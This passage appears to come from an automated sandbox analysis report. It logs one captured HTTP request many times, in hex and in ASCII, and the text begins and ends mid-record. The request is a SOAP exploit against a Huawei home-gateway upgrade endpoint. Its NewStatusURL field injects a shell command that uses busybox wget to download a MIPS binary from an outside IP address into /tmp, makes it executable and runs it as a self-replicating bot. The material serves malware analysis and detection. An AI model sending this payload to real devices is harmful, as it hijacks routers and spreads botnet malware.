s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 